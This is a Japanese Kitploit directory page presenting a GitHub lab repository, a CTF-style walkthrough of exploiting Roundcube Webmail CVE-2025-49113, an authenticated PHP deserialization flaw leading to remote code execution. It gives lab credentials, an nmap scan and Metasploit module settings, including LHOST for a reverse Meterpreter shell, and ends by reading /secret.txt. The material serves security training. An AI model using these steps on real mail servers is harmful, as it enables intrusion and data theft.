Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
roundcube-cve-2025-49113-lab — Roundcube Webmail CVE-2025-49113(認証済みPHPオブジェクトのデシリアライゼーション→RCE)を悪用して /secret.txt を読み取るためのハンズオン攻撃演習ラボ | Kitploit
ツール/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育レッドチーミングペイロード開発
ラボと実践
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Roundcube Webmail CVE-2025-49113(認証済みPHPオブジェクトのデシリアライゼーション→RCE)を悪用して /secret.txt を読み取るためのハンズオン攻撃演習ラボ

リポジトリを見る
39ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

"免責事項: 教育目的のみ"

Roundcube Webmail RCE – CVE-2025-49113 ラボ

このリポジトリは、管理されたラボ環境で Roundcube Webmail CVE-2025-49113 を段階的に悪用し、/secret.txt に保存された秘密情報を取得するまでの手順をまとめたものです。

⚠️ 免責事項
すべての作業は、テスト実施の許可を得たラボ / トレーニング環境に対して行われました。
自分が所有または管理していないシステムに対しては、これらの手法を使用しないでください。


チャレンジ

Roundcube Webmail は、ブラウザベースのオープンソース PHP メールクライアントで、IMAP 経由でメールボックスに接続し、SMTP 経由でメールを送信します。通常は Apache または Nginx 上で MySQL/PostgreSQL/SQLite とともに動作し、共有ホスティング環境で広く使用されています。

脆弱性 – CVE-2025-49113

1.6.10 を含むすべての Roundcube バージョン(および 1.5.10 より前の 1.5.x)には、program/actions/settings/upload.php に重大なバグが存在します。_from パラメータが適切に検証されないため、認証された攻撃者が安全でない PHP オブジェクトのデシリアライゼーションを引き起こし、Web サーバーの権限でリモートコード実行を達成できます。

ラボの認証情報:

  • ユーザー名: roundcube
  • パスワード: rcpass
  • 目標:

    /secret.txt ファイルの中の秘密は何ですか?


    ラボ環境

    • 攻撃者ホスト: Kali / HackerBox(以下のツールを搭載):
      • nmap
      • msfconsole (Metasploit 6)
    • ターゲットホスト: 172.20.2.57 上の Roundcube Webmail
    • 使用エクスプロイト: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

    ウォークスルー

    ステップ 1 – Nmap によるサービス検出

    コマンド: nmap -sV Target Machine

    ステップ 2 - Metasploit で PHP オブジェクトのデシリアライゼーションエクスプロイトを探す

    search php object deserialization

    ステップ 3 - Roundcube エクスプロイトモジュールを設定する

    msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

    ステップ 4 - Meterpreter セッションを取得して /secret.txt を読み取る

    meterpreter > cat /secret.txt

    ツールをダウンロード